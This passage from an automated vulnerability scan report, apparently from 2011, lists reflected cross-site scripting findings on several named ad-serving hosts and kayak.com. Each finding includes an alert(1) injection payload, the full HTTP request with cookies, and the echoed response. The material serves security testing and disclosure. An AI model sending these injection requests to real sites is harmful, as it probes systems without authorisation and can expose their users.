The value of the cwtagid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35868"%3balert(1)//fff8b34fa18 was submitted in the cwtagid parameter. This input was echoed as 35868";alert(1)//fff8b34fa18 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=536454&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=10192835868"%3balert(1)//fff8b34fa18&publisherID=1822&siteID=16543 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/
Cookie: V=ZZVrXBMk1mFi; cwbh1=1914%3B11%2F30%2F2011%3BHWHH1%3B11%2F30%2F2011%3BHOTR1%0A553%3B11%2F24%2F2011%3BMIWO2; pb_rtb_ev="1:530739.4e394470-3e17-879f-6d77-411115d4b5ad.0|537583.9ce25df1-8701-4684-948e-35b3d6998d9a.0|530912.WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA==.0|536088.2040695539456590.0|534889.y9dly9jlztlwn.0|535495.7ef581ac-c15f-11e0-b71a-00259009a9e4.0|534301.04b10af1-b730-4018-9aca-0ef231c6c059.0|530741.f4ed396e-81e1-46ef-82e5-3c1d998c2fa0.0|531399.gl99ih0j0xqn.0|535039.0adf278a-5c84-4e01-8d4e-00e9b3c85ea1.0|538064.6731d4ad-7dae-4402-b507-a0bc233d79fb.0|531292.BO-00000000521444319.0|535461.3827355846744503244.0|537085.439524AE9E11374EB2C0C71740C604.0|538303.x.0|538569.776b70d9-5df4-4d1b-98af-982dd1709cac.0"; FC1-WC=53620_1_3Fx7C^58321_1_3Fx7H^58444_2_3Fx8b^59835_1_3Fxei^58199_1_3Fxeq; FC1-WCR=126997_1_3HHYZ; FC1-PC=58497_3FbP1; C2W4=0

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP202
Last-Modified: Tue, 25 Oct 02011 16:16:07 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Cache-Control: private
Date: Tue, 01 Nov 2011 01:29:15 GMT
Content-Length: 8892
Connection: close
Vary: Accept-Encoding
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Tue, 01-Nov-2011 04:15:55 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="536454";var cwtagid="10192835868";alert(1)//fff8b34fa18";var cwadformat="728X90";var ca="VIEWAD";var cr="200";var cw="728";var ch="90";var cads="0";var cp="536454";var ct="10192835868";alert(1)//fff8b34fa18";var cf="728X90";var cn="1";var epid="1822";var e
...[SNIP]...

3.70. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwwidth request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload faf4b"%3balert(1)//5282da8c62b was submitted in the cwwidth parameter. This input was echoed as faf4b";alert(1)//5282da8c62b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=536454&cwwidth=728faf4b"%3balert(1)//5282da8c62b&cwheight=90&cwpnet=1&cwtagid=101928&publisherID=1822&siteID=16543 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/
Cookie: V=ZZVrXBMk1mFi; cwbh1=1914%3B11%2F30%2F2011%3BHWHH1%3B11%2F30%2F2011%3BHOTR1%0A553%3B11%2F24%2F2011%3BMIWO2; pb_rtb_ev="1:530739.4e394470-3e17-879f-6d77-411115d4b5ad.0|537583.9ce25df1-8701-4684-948e-35b3d6998d9a.0|530912.WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA==.0|536088.2040695539456590.0|534889.y9dly9jlztlwn.0|535495.7ef581ac-c15f-11e0-b71a-00259009a9e4.0|534301.04b10af1-b730-4018-9aca-0ef231c6c059.0|530741.f4ed396e-81e1-46ef-82e5-3c1d998c2fa0.0|531399.gl99ih0j0xqn.0|535039.0adf278a-5c84-4e01-8d4e-00e9b3c85ea1.0|538064.6731d4ad-7dae-4402-b507-a0bc233d79fb.0|531292.BO-00000000521444319.0|535461.3827355846744503244.0|537085.439524AE9E11374EB2C0C71740C604.0|538303.x.0|538569.776b70d9-5df4-4d1b-98af-982dd1709cac.0"; FC1-WC=53620_1_3Fx7C^58321_1_3Fx7H^58444_2_3Fx8b^59835_1_3Fxei^58199_1_3Fxeq; FC1-WCR=126997_1_3HHYZ; FC1-PC=58497_3FbP1; C2W4=0

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP203
Last-Modified: Tue, 25 Oct 02011 16:18:13 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Cache-Control: private
Date: Tue, 01 Nov 2011 01:29:13 GMT
Content-Length: 8864
Connection: close
Vary: Accept-Encoding
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Tue, 01-Nov-2011 04:15:53 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="536454";var cwtagid="101928";var cwadformat="728X90";var ca="VIEWAD";var cr="200";var cw="728faf4b";alert(1)//5282da8c62b";var ch="90";var cads="0";var cp="536454";var ct="101928";var cf="728X90";var cn="1";var epid="1822";var esid="16543";

       String.prototype.cwcontains = function(s) {
           return(this.toLowerCase().index
...[SNIP]...

3.71. http://tag.contextweb.com/TagPublish/getjs.aspx [publisherID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the publisherID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc618"%3balert(1)//6afeacdf2bf was submitted in the publisherID parameter. This input was echoed as bc618";alert(1)//6afeacdf2bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=536454&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=101928&publisherID=1822bc618"%3balert(1)//6afeacdf2bf&siteID=16543 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/
Cookie: V=ZZVrXBMk1mFi; cwbh1=1914%3B11%2F30%2F2011%3BHWHH1%3B11%2F30%2F2011%3BHOTR1%0A553%3B11%2F24%2F2011%3BMIWO2; pb_rtb_ev="1:530739.4e394470-3e17-879f-6d77-411115d4b5ad.0|537583.9ce25df1-8701-4684-948e-35b3d6998d9a.0|530912.WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA==.0|536088.2040695539456590.0|534889.y9dly9jlztlwn.0|535495.7ef581ac-c15f-11e0-b71a-00259009a9e4.0|534301.04b10af1-b730-4018-9aca-0ef231c6c059.0|530741.f4ed396e-81e1-46ef-82e5-3c1d998c2fa0.0|531399.gl99ih0j0xqn.0|535039.0adf278a-5c84-4e01-8d4e-00e9b3c85ea1.0|538064.6731d4ad-7dae-4402-b507-a0bc233d79fb.0|531292.BO-00000000521444319.0|535461.3827355846744503244.0|537085.439524AE9E11374EB2C0C71740C604.0|538303.x.0|538569.776b70d9-5df4-4d1b-98af-982dd1709cac.0"; FC1-WC=53620_1_3Fx7C^58321_1_3Fx7H^58444_2_3Fx8b^59835_1_3Fxei^58199_1_3Fxeq; FC1-WCR=126997_1_3HHYZ; FC1-PC=58497_3FbP1; C2W4=0

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP201
Last-Modified: Tue, 25 Oct 02011 16:13:59 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Cache-Control: private
Date: Tue, 01 Nov 2011 01:29:16 GMT
Content-Length: 8864
Connection: close
Vary: Accept-Encoding
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Tue, 01-Nov-2011 04:15:56 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="536454";var cwtagid="101928";var cwadformat="728X90";var ca="VIEWAD";var cr="200";var cw="728";var ch="90";var cads="0";var cp="536454";var ct="101928";var cf="728X90";var cn="1";var epid="1822bc618";alert(1)//6afeacdf2bf";var esid="16543";

       String.prototype.cwcontains = function(s) {
           return(this.toLowerCase().indexOf(s.toLowerCase()) != -1);
       };
       var _nxy = [-1,-1];
       var _cwd = document;
       var _cww = window;
   
...[SNIP]...

3.72. http://tag.contextweb.com/TagPublish/getjs.aspx [siteID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the siteID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3d8e"%3balert(1)//b077b748e60 was submitted in the siteID parameter. This input was echoed as f3d8e";alert(1)//b077b748e60 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=536454&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=101928&publisherID=1822&siteID=16543f3d8e"%3balert(1)//b077b748e60 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/
Cookie: V=ZZVrXBMk1mFi; cwbh1=1914%3B11%2F30%2F2011%3BHWHH1%3B11%2F30%2F2011%3BHOTR1%0A553%3B11%2F24%2F2011%3BMIWO2; pb_rtb_ev="1:530739.4e394470-3e17-879f-6d77-411115d4b5ad.0|537583.9ce25df1-8701-4684-948e-35b3d6998d9a.0|530912.WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA==.0|536088.2040695539456590.0|534889.y9dly9jlztlwn.0|535495.7ef581ac-c15f-11e0-b71a-00259009a9e4.0|534301.04b10af1-b730-4018-9aca-0ef231c6c059.0|530741.f4ed396e-81e1-46ef-82e5-3c1d998c2fa0.0|531399.gl99ih0j0xqn.0|535039.0adf278a-5c84-4e01-8d4e-00e9b3c85ea1.0|538064.6731d4ad-7dae-4402-b507-a0bc233d79fb.0|531292.BO-00000000521444319.0|535461.3827355846744503244.0|537085.439524AE9E11374EB2C0C71740C604.0|538303.x.0|538569.776b70d9-5df4-4d1b-98af-982dd1709cac.0"; FC1-WC=53620_1_3Fx7C^58321_1_3Fx7H^58444_2_3Fx8b^59835_1_3Fxei^58199_1_3Fxeq; FC1-WCR=126997_1_3HHYZ; FC1-PC=58497_3FbP1; C2W4=0

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP211
Last-Modified: Tue, 25 Oct 02011 16:38:21 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Cache-Control: private
Date: Tue, 01 Nov 2011 01:29:18 GMT
Content-Length: 8864
Connection: close
Vary: Accept-Encoding
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Tue, 01-Nov-2011 04:15:58 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="536454";var cwtagid="101928";var cwadformat="728X90";var ca="VIEWAD";var cr="200";var cw="728";var ch="90";var cads="0";var cp="536454";var ct="101928";var cf="728X90";var cn="1";var epid="1822";var esid="16543f3d8e";alert(1)//b077b748e60";

       String.prototype.cwcontains = function(s) {
           return(this.toLowerCase().indexOf(s.toLowerCase()) != -1);
       };
       var _nxy = [-1,-1];
       var _cwd = document;
       var _cww = window;
       var _cwu = "unde
...[SNIP]...

3.73. http://www.lijit.com/delivery/fp [n parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lijit.com
Path:   /delivery/fp

Issue detail

The value of the n request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cacd3"%3balert(1)//56c2717715 was submitted in the n parameter. This input was echoed as cacd3";alert(1)//56c2717715 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /delivery/fp?u=phytomedia&z=129604&n=1cacd3"%3balert(1)//56c2717715 HTTP/1.1
Host: www.lijit.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://mediaservices-d.openxenterprise.com/w/1.0/afr?auid=36824&cb=INSERT_RANDOM_NUMBER_HERE&rd=60&rm=25&rc=3
Cookie: ljtrtb=eJyrVjJUslIytjAyNzY1tTAxMzcxMTUwNjIxUaoFAFBaBdA%3D; ljt_reader=1860442d61f8e1f2d8924f58549ca25b; OACAP=4578.2; OACCAP=593.1; tpro=eJx1kc1uhSAQhd9l1uSGH%2F%2Bfo7umIQRRSRRuUJs0xnfvDNbebrrjO8ycOQMHPFMc%2FOygO2B0oXeJToshhT9KyWBwNxXNycCMuVZpIUnjgoFAqDMUCI1WBYGqGahSF22GikHJ9XPeV0Ip0SkZm62s2S2JLTaYIWmz3MZm9SYgMJj8%2BrzVuE2UkqOFnfzcJxfIJkQqqBWDL3cNqbHCBxuXPIZrxUkWGEVxXWWQLYOKa8EvwgR4fMVsaUacZ3ctHWL4eYg%2FMiI6jsn0erVTDlmd2Lf6jXK8H%2FkEHbw5vMalNuiEElVRto3EJf69r7gU9fnxuzB%2By%2BZpl1c3gyX22sY9UBODT5dWH%2FE5QDw4nOc3CS%2BEEQ%3D%3D; ljt_csync=rtb_turn%3A1318368324%2Crtb_simplifi%3A1318368324%2Crtb_mmath%3A1318368324%2Crtb_media6%3A1318368324%2C1%3A1318368324; _OACAP[4578]=1; ljt_ts=t=1318368323052224

Response

HTTP/1.1 200 OK
Date: Tue, 01 Nov 2011 02:17:36 GMT
Server: PWS/1.7.3.7
X-Px: ms h0-s1041.p10-sjc ( h0-s1029.p10-sjc), ms h0-s1029.p10-sjc ( origin>CONN)
Cache-Control: max-age=7200
Expires: Tue, 01 Nov 2011 04:17:36 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 18448

var LJT_AdChoices = {
   img1: 'http://www.lijit.com/___lok_a16/res/images/adchoices/adChoicesSmall_icon.png',
   img2: 'http://www.lijit.com/___lok_a16/res/images/adchoices/adChoicesBig_icon.png',
   enabl
...[SNIP]...
ime String', e);
       return "00:00:00";
   }
}

try{
   // Settings: Change these values on a per user basis
   var lwp_ad_username = "phytomedia";
   var lwp_ad_zoneid = ljt_getZoneID();
   var lwp_ad_numads = "1cacd3";alert(1)//56c2717715";
   var lwp_ad_premium = "1";// or 0 for non-premium ad
   var lwp_ad_eleid = "lijit_region_129604";
   var lwp_method = "regex";
   var lwp_referring_search = getReferringSearch(document.referrer);
   
   var l
...[SNIP]...

3.74. http://adnxs.revsci.net/imp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adnxs.revsci.net
Path:   /imp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74ba8'-alert(1)-'95877a0866b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp?Z=728x90&s=1889588&r=1&_salt=501357491&u=http%3A%2F%2Fwww.politico.com%2Findex.html HTTP/1.1
Host: adnxs.revsci.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=74ba8'-alert(1)-'95877a0866b
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Content-Type: text/javascript
Date: Tue, 01 Nov 2011 01:44:01 GMT
Content-Length: 514

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=728x90&referrer=http://www.google.com/search%3Fhl=en%26q=74ba8'-alert(1)-'95877a0866b&inv_code=1889588&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D728x90%26s%3D1889588%26r%3D1%26_salt%3D501357491%26u%3Dhttp%253A%252F%252Fwww.politic
...[SNIP]...

3.75. http://adserving.cpxinteractive.com/st [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9db9'-alert(1)-'15554cd81fa was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=ad&ad_size=300x250&section=1921728&referrer=http://www.politico.com/index.html HTTP/1.1
Host: adserving.cpxinteractive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=f9db9'-alert(1)-'15554cd81fa

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Content-Type: text/javascript
Date: Tue, 01 Nov 2011 01:43:45 GMT
Content-Length: 417

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=300x250&inv_code=1921728&referrer=http://www.google.com/search%3Fhl=en%26q=f9db9'-alert(1)-'15554cd81fa&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D300x250%26section%3D1921728%26referrer%3Dhttp%3A%2F%2Fwww.politico.com%2Findex.htm
...[SNIP]...

3.76. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10794/184979/PortalServe/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/ads.pointroll.com/10794/184979/PortalServe/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5405a"-alert(1)-"7d57fc3ef98 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/ads.pointroll.com/10794/184979/PortalServe/?pid=1422961P11520110926174819&pub=IC52090&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8418303478637639 HTTP/1.1
Host: fw.adsafeprotected.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=5405a"-alert(1)-"7d57fc3ef98

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5C6102E2F6A83F9DB553F50477F682D3; Path=/
Content-Type: text/javascript
Date: Tue, 01 Nov 2011 01:32:00 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.google.com/search?hl=en&q=5405a"-alert(1)-"7d57fc3ef98",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/ads.pointroll.com/10794/184979/PortalServe/?pid=1422961P11520110926174819&pub=IC52090&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/20
...[SNIP]...

3.77. http://www.kayak.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.kayak.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 9bdd6<script>alert(1)</script>f18eed8b017 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.kayak.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=9bdd6<script>alert(1)</script>f18eed8b017

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-UA-Compatible: IE=8
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding
Content-Length: 70370
Date: Mon, 31 Oct 2011 19:05:35 GMT
Connection: close
Set-Cookie: dc=dc1; Path=/
Set-Cookie: cluster=2; Path=/
Set-Cookie: NSC_q2-tqbslmf=ffffffff09172a1245525d5f4f58455e445a4a422a59;Version=1;Max-Age=1200;path=/;httponly
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Cache-Control: pre-check=0, post-check=0
Expires: 0

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- Copyright 2004-2010 Kayak Software Corp, All Rights Reserved.
...[SNIP]...
<b>"9bdd6<script>alert(1)</script>f18eed8b017"</b>
...[SNIP]...

3.78. http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1 [AA002 cookie]  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://view.atdmt.com
Path:   /iaction/adoapn_AppNexusDemoActionTag_1

Issue detail

The value of the AA002 cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aee9c"><a>587f12fdd92 was submitted in the AA002 cookie. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /iaction/adoapn_AppNexusDemoActionTag_1 HTTP/1.1
Host: view.atdmt.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://teamsupport.com/
Cookie: AA002=1311365777-4076437aee9c"><a>587f12fdd92; MUID=360F843730F542A7A6E2E0ACB7BADB9D; ach00=e2ff/25d1:233cf/25d1:ceda/2b2a4:66c2/2b2a3:66c2/2b393:66c2/2b2a2:f594/1c01f:bab9/2b2a4:bab9/2b2a3; ach01=d518598/25d1/145a59c2/e2ff/4e3f43a9:d75a0d4/25d1/13ed2747/233cf/4e496158:d3ff520/2b2a4/13cf9a34/ceda/4e6039d7:d4250f2/2b2a3/13d2744e/66c2/4e603a12:d4250a3/2b2a3/13d274ac/66c2/4e90e866:dff8d3d/2b393/14ee73cc/66c2/4e90e867:e2b4cbd/2b2a2/14fafa61/66c2/4e90ead1:421378c/1c01f/825b020/f594/4e95bdf7:d823c65/1c01f/152e108f/f594/4e95bfbe:421378c/1c01f/88b46cd/f594/4e95bfc0:421378c/1c01f/88b65cd/f594/4e95bfc5:421378c/1c01f/825b022/f594/4e95bfc9:e6bc369/2b2a4/155fd88a/bab9/4ea6f54a:d6a0d6a/2b2a3/14043308/bab9/4eab26d6; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b9f&W=1; NAP=V=1.9&E=b45&C=fwpnHGQ2X_czDvTIj3ESgREE63mN7SiurD-8ETgQspHQSOUuQ0Sfog&W=1; TOptOut=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Mon, 31 Oct 2011 19:39:32 GMT
Connection: close
